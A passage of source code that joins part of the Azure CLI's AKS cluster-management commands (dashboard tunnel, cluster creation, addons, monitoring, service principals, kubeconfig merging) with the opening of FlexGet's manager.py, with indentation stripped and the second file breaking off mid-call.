raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:9090".format(listen_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
# TODO: Better error handling here.
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
skip_subnet_role_assignment=False,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
max_pods=int(max_pods) if max_pods else None
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ContainerServiceServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address, network_policy]):
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
if 'omsagent' in addon_profiles:
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=False if disable_rbac else True,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=mc)
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
else:
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
instance.kubernetes_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces-preview'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces_preview.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience.
:type space_name: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon == 'aciConnector' + os_type:
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureLocationToOmsRegionCodeMap = {
"eastus": "EUS",
"westeurope": "WEU",
"southeastasia": "SEA",
"australiasoutheast": "ASE",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"japaneast": "EJP",
"uksouth": "SUK",
"canadacentral": "CCA",
"centralindia": "CIN",
"eastus2euap": "EAP"
}
AzureRegionToOmsRegionMap = {
"australiaeast": "australiasoutheast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "eastus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "eastus",
"eastasia": "southeastasia",
"eastus": "eastus",
"eastus2": "eastus",
"japaneast": "japaneast",
"japanwest": "japaneast",
"northcentralus": "eastus",
"northeurope": "westeurope",
"southcentralus": "eastus",
"southeastasia": "southeastasia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westus": "eastus",
"westus2": "eastus",
"centralindia": "centralindia",
"southindia": "centralindia",
"westindia": "centralindia",
"koreacentral": "southeastasia",
"koreasouth": "southeastasia",
"francecentral": "westeurope",
"francesouth": "westeurope"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
default_region_name = "eastus"
default_region_code = "EUS"
workspace_region = AzureRegionToOmsRegionMap[
rg_location] if AzureRegionToOmsRegionMap[rg_location] else default_region_name
workspace_region_code = AzureLocationToOmsRegionCodeMap[
workspace_region] if AzureLocationToOmsRegionCodeMap[workspace_region] else default_region_code
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal)
return load_acs_service_principal(subscription_id)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"centralus",
"eastus",
"eastus2",
"westus",
"westus2",
"northeurope",
"westeurope",
"southeastasia",
"australiaeast"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
|
manager.py
|
import argparse # noqa
import atexit # noqa
import codecs # noqa
import copy # noqa
import errno # noqa
import fnmatch # noqa
import hashlib # noqa
import os # noqa
import shutil # noqa
import signal # noqa
import sys # noqa
import threading # noqa
import traceback # noqa
from contextlib import contextmanager # noqa
from datetime import datetime, timedelta # noqa
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union, Dict, TYPE_CHECKING # noqa
import sqlalchemy # noqa
import yaml # noqa
from loguru import logger # noqa
from sqlalchemy.engine import Engine
from sqlalchemy.exc import OperationalError # noqa
from sqlalchemy.ext.declarative import declarative_base # noqa
from sqlalchemy.orm import sessionmaker # noqa
# These need to be declared before we start importing from other flexget modules, since they might import them
from flexget.utils.sqlalchemy_utils import ContextSession # noqa
from flexget.utils.tools import get_current_flexget_version, io_encoding, pid_exists # noqa
Base = declarative_base()
Session: Type[ContextSession] = sessionmaker(class_=ContextSession)
import flexget.log # noqa
from flexget import config_schema, db_schema, plugin # noqa
from flexget.event import fire_event # noqa
from flexget.ipc import IPCClient, IPCServer # noqa
from flexget.options import ( # noqa
CoreArgumentParser,
ParserError,
get_parser,
manager_parser,
unicode_argv,
)
from flexget.task import Task # noqa
from flexget.task_queue import TaskQueue # noqa
from flexget.terminal import console, get_console_output # noqa
if TYPE_CHECKING:
from flexget.tray_icon import TrayIcon
from flexget.utils.simple_persistence import SimplePersistence
logger = logger.bind(name='manager')
manager: Optional['Manager'] = None
DB_CLEANUP_INTERVAL = timedelta(days=7)
class Manager:
"""Manager class for FlexGet
Fires events:
* manager.initialize
The first time the manager is initialized, before config is loaded
* manager.before_config_load
Before the config file is loaded from disk
* manager.before_config_validate
When updating the config, before the validator is run on it
* manager.config_updated
After a configuration file has been loaded or changed (and validated) this event is fired
* manager.startup
After manager has been initialized. This is when application becomes ready to use,
however no database lock is present, so the database must not be modified on this event.
* manager.lock_acquired
The manager does not always require a lock on startup, if one is requested,
this event will run when it has been acquired successfully
* manager.upgrade
If any plugins have declared a newer schema version than exists in the database,
this event will be fired to allow plugins to upgrade their tables
* manager.shutdown_requested
When shutdown has been requested. Any plugins which might add to
execution queue should stop when this is fired.
* manager.shutdown
When the manager is exiting
* manager.execute.completed
If execution in current process was completed
* manager.daemon.started
* manager.daemon.completed
* manager.db_cleanup
"""
unit_test = False
options: argparse.Namespace
def __init__(self, args: Optional[List[str]]) -> None:
"""
:param args: CLI args
"""
global manager
if not self.unit_test:
assert not manager, 'Only one instance of Manager should be created at a time!'
elif manager:
logger.info('last manager was not torn down correctly')
if args is None:
# Decode all arguments to unicode before parsing
args = unicode_argv()[1:]
self.args = args
self.autoreload_config = False
self.config_file_hash: Optional[str] = None
self.config_base: str = ''
self.config_name: str = ''
self.config_path: str = ''
self.log_filename: str = ''
self.db_filename: str = ''
self.engine: Optional[Engine] = None
self.lockfile: str = ''
self.database_uri: str = ''
self.db_upgraded = False
self._has_lock = False
self.is_daemon = False
self.ipc_server: IPCServer
self.task_queue: TaskQueue
self.persist: 'SimplePersistence'
self.initialized = False
self.config: Dict = {}
self.options = self._init_options(self.args)
try:
self._init_config(create=False)
except Exception:
flexget.log.start(level=self.options.loglevel, to_file=False)
raise
manager = self
logger.debug('sys.defaultencoding: {}', sys.getdefaultencoding())
logger.debug('sys.getfilesystemencoding: {}', sys.getfilesystemencoding())
logger.debug('flexget detected io encoding: {}', io_encoding)
logger.debug('os.path.supports_unicode_filenames: {}', os.path.supports_unicode_filenames)
if (
codecs.lookup(sys.getfilesystemencoding()).name == 'ascii'
and not os.path.supports_unicode_filenames
):
logger.warning(
'Your locale declares ascii as the filesystem encoding. Any plugins reading filenames from '
'disk will not work properly for filenames containing non-ascii characters. Make sure your '
'locale env variables are set up correctly for the environment which is launching FlexGet.'
)
def _add_tray_icon_items(self, tray_icon: 'TrayIcon'):
tray_icon.add_menu_item(text='Shutdown', action=self.shutdown, index=2)
tray_icon.add_menu_item(text='Reload Config', action=self.load_config, index=3)
tray_icon.add_menu_separator(index=4)
@staticmethod
def _init_options(args: List[str]) -> argparse.Namespace:
"""Initialize argument parsing"""
try:
options = CoreArgumentParser().parse_known_args(args, do_help=False)[0]
except ParserError as exc:
try:
# If a non-built-in command was used, we need to parse with a parser that
# doesn't define the subparsers
options = manager_parser.parse_known_args(args, do_help=False)[0]
except ParserError:
manager_parser.print_help()
print(f'\nError: {exc.message}')
sys.exit(1)
return options
def _init_logging(self, to_file: bool = True) -> None:
"""Initialize logging facilities"""
log_file = os.path.expanduser(self.options.logfile)
# If an absolute path is not specified, use the config directory.
if not os.path.isabs(log_file):
log_file = os.path.join(self.config_base, log_file)
self.log_filename = log_file
flexget.log.start(
